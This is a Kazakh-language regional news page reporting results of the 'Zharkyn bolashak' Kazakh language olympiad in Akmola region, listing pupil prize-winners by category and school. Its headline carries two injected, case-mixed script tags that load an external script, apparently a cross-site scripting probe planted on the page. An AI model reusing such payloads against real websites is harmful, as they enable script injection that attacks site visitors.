«Жарқын болашақ» республикалық қазақ тілі олимпиадасының облыстық кезеңін қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.04.2023

Ақмола облысы білім басқармасының дарынды балалар мен талантты жастарды анықтау және қолдау жөніндегі орталығы 2023 жылғы 20-22 cәуір аралығында Ақмола облысы білім басқармасының «Білім-инновация» лицей-интернатының базасында «Жарқын болашақ» республикалық қазақ тілі олимпиадасының облыстық кезеңін өткізді.

«Жарқын болашақ» олимпиадасы «Білім-инновация» халықаралық қоғамдық қоры тарапынан жыл сайын өткізілетін олимпиада болып табылады.

Олимпиаданың мақсаты:

  • мемлекеттік тілдің қолданылу аясын кеңейту;
  • қазақ халқының мәдени, әдеби және рухани қазыналарын кеңінен насихаттау;
  • оқушылардың шығармашылық, ізденушілік қабілеттерін, мәдени дүниетанымын дамыту.

Олимпиадасының негізгі міндеттері:

  • оқушылардың қазақ халқының тіліне, әдебиетіне, салт-дәстүрлеріне, тарихына және мәдениетіне деген қызығушылығын арттыру, қазақ халқының тарихын үйреніп, білуге ынталандыру;
  • тұлғаның өз-өзін дамытуына және өзіндік қабілеттерін жетілдіруіне жағдай жасау.

 «Жарқын болашақ» олимпиадасына қазақ және орыс тілдерінде оқытатын жалпы білім беретін мектептердің 7-11 сынып оқушылары қатысты (13-18 жас аралығы).

Олимпиадаға Ақкөл, Аршалы,  Атбасар, Бұланды,  Бурабай, Ерейментау, Есіл,  Жарқайын,  Жақсы,  Зеренді, Сандықтау, Целиноград, Шортанды аудандары мен Көкшетау, Степногорск, Қосшы қалалары мен Көкшетау қаласы, «Білім-инновация» лицей-интернаты, "Астана қаласы, №2 "Дарын" облыстық мамандандырылған мектеп-лицей-интернаты, Көкшетау қаласы, Абай атындағы (қазақ тілінде оқытылатын) дарынды балаларға арналған облыстық мамандандырылған мектеп-интернаты, Щучинск қаласының «Білім-инновация» ІТ лицей-интернатынан барлығы 108 оқушы  қатысты.

«Жарқын болашақ» олимпиадасы 5 бағыт бойынша өткізілді:

1.«Бейнелеушілер» (қазақ әдебиетіндегі шығармаларды комикс жанрында салу);

2.«Білгірлер бәйгесі» (мақал-мәтел, жұмбақ, ертегілер бойынша сайыс);

3.«Жас қаламгер» (жазбаша шығармашылық жұмыс),

4.«Сөз шеберлері» (Көпшілік алдында белгілі бір тақырыпта сөз сөйлеу);

5.«Әнші-бұлбұлдар» (ән айту).

Олимпиаданың қорытындысы бойынша I-дәрежелі  дипломмен марапатталған оқушылар:

1.«Бейнелеушілер» (қаз.)  бағыты бойынша Телжанов Магжан - Бұланды ауданы, Макинск қаласының №2 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

2.«Бейнелеушілер» (орыс.)  бағыты бойынша Алиферова Анастасия - Аршалы ауданы, Арнасай ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы;

3.«Білгірлер бәйгесі» (қаз.)  бағыты бойынша Наурызбаева Меруерт - Щучинск қаласының «Білім – инновация» ІТ лицей – интернатының 8-сынып оқушысы;

4.«Білгірлер бәйгесі» (орыс.)  бағыты бойынша Шамилов Кемаль  - Атбасар ауданы, №2 жалпы білім беретін мектебінің  7-сынып оқушысы;

5.«Жас қаламгер» (қаз.)  бағыты бойынша Құрман Әділбек - Щучинск қаласының «Білім-инновация» ІТ лицей-интернатының 10-сынып оқушысы;

6.«Жас қаламгер» (орыс.)  бағыты бойынша Сафронова Диана - Ақкөл ауданы, Ақкөл қаласының № 4 жалпы орта білім беретін мектебінің 11-сынып оқушысы;

7.«Сөз шеберлері» (қаз.)  бағыты бойынша Кенжебек Гүлжан - Целиноград ауданы, Тасты ауылының  жалпы орта білім беретін мектебінің 10-сынып оқушысы;

8.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Султанова Индира  -  Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

9.«Әнші-бұлбұлдар» (орыс.)  бағыты бойынша Титова Эвелина - Көкшетау қаласы, Көкшетау қаласының техниқалық лицейнің 8-сынып оқушысы.

Олимпиаданың қорытындысы бойынша IІ-дәрежелі  дипломмен марапатталған оқушылар:

1.«Бейнелеушілер» (қаз.)  бағыты бойынша Жунусова Айнур - Көкшетау қаласы, Көкшетау қаласының № 19 жалпы орта білім беретін мектебінің 9-сынып оқушысы;

2.«Бейнелеушілер» (қаз.)  бағыты бойынша Сейтгалиева Камила - Жарқайың ауданы, Державин қаласының А.Үкібаев атындағы жалпы орта білім беретін мектебінің 8-сынып оқушысы;

3.«Бейнелеушілер» (орыс.)  бағыты бойынша Федосеева Виолетта - Ақкөл  ауданы, Ақкөл қаласының  Кеңес Одағының Батыры Петр Исаков атындағы №1 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

4.«Бейнелеушілер» (орыс.)  бағыты бойынша Янкова Арина - Сандықтау ауданы бойынша білім бөлімi  Лесное ауылының жалпы орта білім  беретін мектебінің 9-сынып оқушысы;

5.«Білгірлер бәйгесі» (қаз.)  бағыты бойынша Аманжол Аяжан - Абай атындағы  дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының 8-сынып оқушысы;

6.«Білгірлер бәйгесі» (қаз.)  бағыты бойынша Қадысқызы Меруерт - Бурабай ауданы, Атамекен ауылының жалпы орта білім беретін мектебінің 7-сынып оқушысы;

7. «Білгірлер бәйгесі» (орыс.)  бағыты бойынша Муслимова Камила  -  Бурабай ауданы, Сәкен Сейфуллин атындағы жалпы орта білім беретін мектебінің 9-сынып оқушысы;

8.«Жас қаламгер» (қаз.)  бағыты бойынша Телжан Иманали - Көкшетау қаласы  "Білім-инновация" лицей-интернатының 8-сынып оқушысы;

9.«Жас қаламгер» (қаз.)  бағыты бойынша Рашит Султана - Бурабай ауданы,  Щучинск қаласының № 9 мектеп-гимназиясының 11-сынып оқушысы;

10.«Жас қаламгер» (орыс.)  бағыты бойынша Рябов Тимур - Щучинск қаласының «Білім - инновация» ІТ лицей -интернатының 10-сынып оқушысы;

11.«Сөз шеберлері» (қаз.)  бағыты бойынша Сашкақызы Камила - Көкшетау қаласы, Абай атындағы  дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының  9-сынып оқушысы;

12.«Сөз шеберлері» (қаз.)  бағыты бойынша Тилеухан Еңілік -  Бурабай ауданы, Атамекен ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы;

13.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Әміржан Нұрлы  - Абай атындағы дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының 10-сынып оқушысы;

14.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Шыңғыс Олжас  -  Целиноград ауданы, Ақмол ауылының  жалпы орта білім беретін мектебінің 9-сынып оқушысы;

15.«Әнші-бұлбұлдар» (орыс.)  бағыты бойынша Светличная Виктория - Жарқайың ауданы, Державин қаласының Н.Крупская атындағы жалпы орта білім беретін мектебінің 11-сынып оқушысы.

Олимпиаданың қорытындысы бойынша IІІ- дәрежелі  дипломмен марапатталған оқушылар:

1.«Бейнелеушілер» (қаз.)  бағыты бойынша Рысбек Балауса  - Қосшы қаласы, Қосшы қаласы №2 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

2.«Бейнелеушілер» (қаз.)  бағыты бойынша Муслим Мөлдір  - Степногорск қаласы, Қаныш Сәтпаев атындағы  №9 жалпы орта білім беретін мектебінің 8-сынып оқушысы;

3.«Бейнелеушілер» (қаз.)  бағыты бойынша Сакенова Диана  - Астана қаласы, №2 "Дарын" облыстық мамандандырылған мектеп-лицей-интернатының 8-сынып оқушысы;

4.«Бейнелеушілер» (орыс.)  бағыты бойынша Червенко София -  Щучинск қаласының «Білім – инновация» ІТ лицей – интернатының 8-сынып оқушысы;

5.«Бейнелеушілер» (орыс.)  бағыты бойынша Рудоман Александра -  Атбасар ауданы, Атбасар қаласының №2 жалпы білім беретін мектебінің 7-сынып оқушысы;

6.«Бейнелеушілер» (орыс.)  бағыты бойынша Задорожных Виктория -  Қосшы қаласы, Қосшы қаласы №2 жалпы орта білім беретін мектебінің 9-сынып оқушысы;

7.«Білгірлер бәйгесі» (қаз.) бағыты бойынша Толгатов Еламан - Ақкөл ауданы, Ақкөл қаласының   Ж.Бектұров атындағы № 3 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

8.«Білгірлер бәйгесі» (қаз.) бағыты бойынша Сагидуллаев Бекарыс-Ерейментау ауданы, Ерейментау қаласының Бөгенбай батыр атындағы мектеп-лицейінің 10-сынып оқушысы;

9.«Білгірлер бәйгесі» (қаз.) бағыты бойынша Сейлбек Ерназар-Зеренді ауданы, Игілік ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы;

10. «Білгірлер бәйгесі» (орыс.)  бағыты бойынша Семеновых Алина   -  Щучинск қаласының «Білім – инновация» ІТ лицей – интернатының 8-сынып оқушысы;

11.«Жас қаламгер» (қаз.)  бағыты бойынша Кажумуратова Аружан  - Көкшетау қаласының М.Ғабдуллин атындағы № 3 көпсалалы  гимназиясының 9-сынып оқушысы;

12.«Жас қаламгер» (қаз.)  бағыты бойынша Хамзина Аида  - Жақсы ауданы, Жақсы ауылының № 1 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

13.«Жас қаламгер» (қаз.)  бағыты бойынша Асилбеков Абылайхан  - Қосшы қаласы, Қосшы қаласы №2 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

14.«Жас қаламгер» (орыс.)  бағыты бойынша Исаева Мави - Қосшы қаласы, Қосшы қаласы Р.Қошқарбай атындағы №1 орта мектебінің 9-сынып оқушысы;

15.«Сөз шеберлері» (қаз.)  бағыты бойынша Болат Мирас -  Көкшетау қаласы "Білім-инновация" лицей-интернатының 9-сынып оқушысы;

16.«Сөз шеберлері» (қаз.)  бағыты бойынша Алмас Аяулым  -   Есіл  ауданы, Есіл  қаласының   №3жалпы орта  білім  беретін  мектебінің 8-сынып оқушысы;

17.«Сөз шеберлері» (қаз.)  бағыты бойынша Оңғар Мадина   -    Степногорск қаласы, Степногорск қаласының Л.Н.Толстой атындағы № 4 мектеп-гимназиясының 8-сынып оқушысы;

18.«Сөз шеберлері» (орыс.)  бағыты бойынша Тришин Алексей -  Ақкөл ауданы, Еңбек ауылының Кеңес Одағының Батыры, Халық Қаһарманы С.Нұрмағамбетов атындағы Еңбек орта мектеп- бақшасының 7-сынып оқушысы;

19.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Жаңбырбай Алим - Көкшетау қаласы, Көкшетау қаласының № 17 мектеп-гимназиясының 10-сынып оқушысы;

20.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Ахметова Камила  - Степногорск қаласы, Степногорск қаласының С.Сейфуллин атындағы № 5 көпсалалы мектеп-лицейінің 11-сынып оқушысы;

21.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Өмірзаққызы Қарақат  -  Шортанды ауданы, Шортанды кентінің №3 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

22.«Әнші-бұлбұлдар» (орыс.)  бағыты бойынша Рязанова Татьяна -  Ақкөл ауданы,  Новорыбин ауылының мектеп- балабақшасының 7-сынып оқушысы.

Олимпиаданың қорытындысы бойынша грамотамен марапатталған оқушылар:

1.«Білгірлер бәйгесі» (қаз.) бағыты бойынша Лес Нұрсая  - Қосшы қаласы, №2 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

2. «Білгірлер бәйгесі» (орыс.)  бағыты бойынша Джаборова Антонина   -  Ақкөл ауданы, Домбыралы ауылының   Горький атындағы мектеп – балабақшасының 9-сынып оқушысысы;

3.«Жас қаламгер» (қаз.)  бағыты бойынша Касенова Дария  -  Абай атындағы дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының 9-сынып оқушысы;

4.«Жас қаламгер» (қаз.)  бағыты бойынша Жанауова Мереим   - Астана қаласы, №2 "Дарын" облыстық мамандандырылған мектеп-лицей-интернатының 9-сынып оқушысы;

5.«Сөз шеберлері» (қаз.)бағыты бойынша Умарова Ұлжан   -    Қосшы қаласы,Тайтөбе ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы;

6.«Сөз шеберлері» (орыс.)  бағыты бойынша Сон Лилия -   Бұланды ауданы, Макинск қаласының №1 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

7.«Әнші-бұлбұлдар» (қаз.)  бағыты бойынша Қазымбек Ұлан   -  Жақсы ауданы, Жақсы ауылының № 1 жалпы орта білім беретін мектебінің 9-сынып оқушысы;

8.«Әнші-бұлбұлдар» (орыс.)  бағыты бойынша Трошкина Анжела - Бұланды ауданы, Никольск ауылының №2 жалпы білім беретін мектебінің                                             8-сынып  оқушысы.

         Олимпиада қорытындысы бойынша I орынға иеленген қатысушылар «Жарқын болашақ» олимпиадасының республикалық кезеңінде облысымыздың намысын қорғайды.

         Жүлдегерлерімізді олимпиадағы жеңіспен құттықтаймыз! Қол жеткізген нәтижеге тоқталмай дамуға және көбірек білуге ұмтылуды тілейміз!!!

 

Просмотров: 323


Пікір қосу



Деректерді қолтаңбаға қосу